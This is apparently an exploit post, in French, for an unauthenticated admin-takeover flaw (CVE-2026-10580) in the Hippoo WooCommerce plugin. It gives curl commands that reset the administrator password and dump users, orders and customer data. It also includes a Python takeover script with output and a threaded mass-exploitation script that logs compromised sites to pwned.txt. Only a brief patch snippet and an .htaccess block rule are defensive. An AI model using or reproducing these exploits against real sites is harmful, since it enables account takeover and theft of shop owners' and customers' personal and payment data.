
Hippoo Mobile App for WooCommerce <= 1.9.4 - Contournement d'authentification non authentifié conduisant à une prise de contrôle du compte administrateur
Non authentifié → Prise de contrôle du compte administrateur via un bug de confusion logique
| CVE | CVE-2026-10580 |
| Plugin | Hippoo Mobile App for WooCommerce |
| Version | ≤ 1.9.4 |
| CVSS | 9.8 (Critique) |
| Authentification requise | ❌ Non |
| Prise de contrôle admin | ✅ Oui |
| Données WooCommerce | ✅ Accès complet |
La fonction get_user_permissions() retourne null pour l'admin (correct) et l'utilisateur non authentifié (INCORRECT).
has_role_access() voit null → accorde un accès complet.
En conséquence :
/wp-json/wc-hippoo/v1/ext/*
→ Sans connexion, sans cookie, sans nonce
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users?per_page=10" | jq .
curl -X POST "https://target.com/wp-json/wc-hippoo/v1/ext/wp/v2/users/1" \
-H "Content-Type: application/json" \
-d '{"password":"Pwned123!"}'
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/orders?per_page=50"
curl -s "https://target.com/wp-json/wc-hippoo/v1/ext/wc/v3/customers?per_page=50"
#!/usr/bin/env python3
import requests
import sys
import json
def exploit(target, admin_id=1, new_password="PwnedCVE2026!!"):
base = target.rstrip('/')
# Step 1 - Enumeration
users_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users"
r = requests.get(users_url)
if r.status_code != 200:
print(f"[-] Not vulnerable: {target}")
return False
users = r.json()
print(f"[+] Found {len(users)} user(s)")
# Step 2 - Password reset
takeover_url = f"{base}/wp-json/wc-hippoo/v1/ext/wp/v2/users/{admin_id}"
r2 = requests.post(takeover_url, json={"password": new_password})
if r2.status_code == 200:
print(f"[✓] ADMIN TAKEOVER: {target}")
print(f" Login: {base}/wp-admin")
print(f" Password: {new_password}")
return True
else:
print(f"[-] Failed: {target}")
return False
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} https://target.com")
sys.exit(1)
exploit(sys.argv[1])
python3 exploit.py https://poloss.ddev.site
Sortie :
[+] Found 1 user(s)
[✓] ADMIN TAKEOVER: https://poloss.ddev.site
Login: https://poloss.ddev.site/wp-admin
Password: PwnedCVE2026!!
import requests
from concurrent.futures import ThreadPoolExecutor, as_completed
def takeover(target):
try:
r = requests.post(
f"{target.rstrip('/')}/wp-json/wc-hippoo/v1/ext/wp/v2/users/1",
json={"password": "MassPwned2026!!"},
timeout=10
)
if r.status_code == 200:
print(f"[✓] TAKEOVER: {target}")
with open("pwned.txt", "a") as f:
f.write(f"{target} | admin | MassPwned2026!!\n")
except:
pass
with open("targets.txt") as f:
urls = [line.strip() for line in f if line.strip()]
with ThreadPoolExecutor(max_workers=20) as executor:
for url in urls:
executor.submit(takeover, url)
if (empty($user) || !$user->exists()) {
return false; // BUKAN NULL
}
if ($perms === false) {
return false; // Unauthenticated denied
}
RewriteCond %{REQUEST_URI} ^/wp-json/wc-hippoo/v1/ext/
RewriteCond %{HTTP_COOKIE} !wordpress_logged_in
RewriteRule .* - [F,L]
CVE-2026-10580 • 100% POC • Sans authentification • Prise de contrôle admin complète
#WordPress #WooCommerce #Poloss #W.P.E.F
| Endpoint | Données |
|---|
/wp-json/wc-hippoo/v1/ext/wp/v2/users | Tous les utilisateurs WP |
/wp-json/wc-hippoo/v1/ext/wp/v2/users/1 | Prise de contrôle admin |
/wp-json/wc-hippoo/v1/ext/wc/v3/orders | Commandes complètes |
/wp-json/wc-hippoo/v1/ext/wc/v3/products | Produits + stock |
/wp-json/wc-hippoo/v1/ext/wc/v3/customers | Données personnelles clients |
/wp-json/wc-hippoo/v1/ext/wc/v3/coupons | Codes promo |
/wp-json/wc-hippoo/v1/ext/wc/v3/reports | Rapports de ventes |
/wp-json/wc-hippoo/v1/ext/wc/v3/payment_gateways | Configuration de paiement |
| Vecteur | Valeur |
|---|
| AV | Réseau |
| AC | Faible |
| PR | Aucun |
| UI | Aucune |
| S | Non modifié |
| C | Élevé |
| I | Élevé |
| A | Élevé |